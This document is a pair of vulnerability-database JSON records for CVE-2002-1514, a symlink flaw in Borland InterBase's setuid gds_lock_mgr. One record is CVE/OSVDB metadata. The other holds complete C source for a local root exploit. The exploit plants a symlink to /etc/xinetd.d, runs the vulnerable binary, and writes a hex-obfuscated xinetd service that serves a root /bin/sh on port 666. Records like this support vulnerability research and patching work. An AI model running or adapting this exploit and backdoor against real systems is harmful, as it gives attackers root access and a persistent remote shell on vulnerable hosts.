{"type": "osvdb", "published": "2002-09-25T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:10832", "bulletinFamily": "software", "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 7.2}, "viewCount": 1, "edition": 1, "reporter": "OSVDB", "title": "Borland Interbase gds_lock_mgr Temp File Overflow", "affectedSoftware": [], "enchantments": {"score": {"value": 6.4, "vector": "NONE", "modified": "2017-04-28T13:20:06", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-1514"]}, {"type": "exploitdb", "idList": ["EDB-ID:21865"]}], "modified": "2017-04-28T13:20:06", "rev": 2}, "vulnersScore": 6.4}, "references": [], "id": "OSVDB:10832", "lastseen": "2017-04-28T13:20:06", "cvelist": ["CVE-2002-1514"], "modified": "2002-09-25T00:00:00", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-09/0311.html\nISS X-Force ID: 10196\n[CVE-2002-1514](https://vulners.com/cve/CVE-2002-1514)\nBugtraq ID: 5805\n"}

{"cve": [{"lastseen": "2020-10-03T11:37:00", "description": "gds_lock_mgr in Borland InterBase allows local users to overwrite files and gain privileges via a symlink attack on a \"isc_init1.X\" temporary file, as demonstrated by modifying the xinetdbd file.", "edition": 3, "cvss3": {}, "published": "2003-04-02T05:00:00", "title": "CVE-2002-1514", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1514"], "modified": "2008-09-05T20:30:00", "cpe": ["cpe:/a:borland_software:interbase:5.0", "cpe:/a:borland_software:interbase:6.5", "cpe:/a:borland_software:interbase:4.0", "cpe:/a:borland_software:interbase:6.0"], "id": "CVE-2002-1514", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1514", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:borland_software:interbase:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:6.5:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:6.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T17:27:15", "description": "Interbase 5/6 GDS_Lock_MGR UMask File Permission Changing Vulnerability. CVE-2002-1514. Local exploit for linux platform", "published": "2002-09-25T00:00:00", "type": "exploitdb", "title": "Interbase 5/6 GDS_Lock_MGR UMask File Permission Changing Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-1514"], "modified": "2002-09-25T00:00:00", "id": "EDB-ID:21865", "href": "https://www.exploit-db.com/exploits/21865/", "sourceData": "source: http://www.securityfocus.com/bid/5805/info\r\n\r\nInterbase is a SQL database distributed and maintained by Borland. It is available for Unix and Linux operating systems.\r\n\r\nThe gds_lock_mgr program within Interbase is typically installed setuid. This program does not properly handle user-supplied umasks, and may allow the creation of files with insecure permissions as a privileged user.\r\n\r\n\r\n// gds_lock_mgr easy local root compromise\r\n// All cobalt Linux affected, and certain mandrake installations.\r\n// Wouter ter Maat aka grazer - http://www.i-security.nl\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/utsname.h>\r\n\r\n#define BDPATH \"/etc/xinetd.d/xinetdbd\"\r\n#define GDSBIN \"/opt/interbase/bin/gds_lock_mgr\"\r\n\r\nint main() {\r\n\r\nstruct utsname buf;\r\nchar path[24], lnc[34];\r\n \r\nFILE *fd;\r\n\r\n/* check for a rootshell on port 666 after the machine has rebooted.\r\n * exploit written to work on a raq550 using xinetd\r\n */\r\n\r\nchar *hexbd = \"\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x20\\x78\\x69\\x6e\\x65\\x74\\x64\"\r\n \"\\x62\\x64\\n\\x7b\\n\\x64\\x69\\x73\\x61\\x62\\x6c\\x65\\x20\\x3d\\x20\"\r\n \"\\x6e\\x6f\\n\\x70\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x20\\x3d\\x20\\x36\"\r\n \"\\x36\\x36\\n\\x73\\x6f\\x63\\x6b\\x65\\x74\\x5f\\x74\\x79\\x70\\x65\\x20\"\r\n \"\\x3d\\x20\\x73\\x74\\x72\\x65\\x61\\x6d\\n\\x77\\x61\\x69\\x74\\x20\\x3d\"\r\n \"\\x20\\x6e\\x6f\\n\\x75\\x73\\x65\\x72\\x20\\x3d\\x20\\x72\\x6f\\x6f\\x74\"\r\n \"\\n\\x73\\x65\\x72\\x76\\x65\\x72\\x20\\x3d\\x20\\x2f\\x62\\x69\\x6e\\x2f\"\r\n \"\\x73\\x68\\n\\x73\\x65\\x72\\x76\\x65\\x72\\x5f\\x61\\x72\\x67\\x73\\x20\"\r\n \"\\x3d\\x20\\x2d\\x69\\n\\x7d\\n\";\r\n\r\nfprintf(stdout, \"*** gds_lock_mgr local root exploit - grazer ***\\n\");\r\n\r\nuname(&buf);\r\nsetenv(\"INTERBASE\", \"/tmp\", 1); \r\nsprintf(path, \"%s\", \"/tmp/isc_init1.\");\r\nstrcat(path, buf.nodename);\r\n\r\nchdir(\"/tmp\");\r\numask(000);\r\n\r\nsprintf(lnc, \"ln %s -s %s\", BDPATH, path);\r\nsystem(lnc);\r\n\r\nif(fd=fopen(GDSBIN, \"r\")) {\r\nsystem(GDSBIN); close(fd); }\r\nelse {\r\nfprintf(stderr, \"%s not found...\\n\", GDSBIN); \r\nexit(0); }\r\n\r\nif(fd=fopen(BDPATH, \"w\")) { \r\nfprintf(stderr,\" exploit succesfull...\\n\");\r\nfprintf(fd, \"%s\", hexbd); close(fd);}\r\nelse {\r\nfprintf(stderr, \"exploit failed...\\n\"); \r\nexit(0); }\r\n\r\n}\r\n\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/21865/"}]}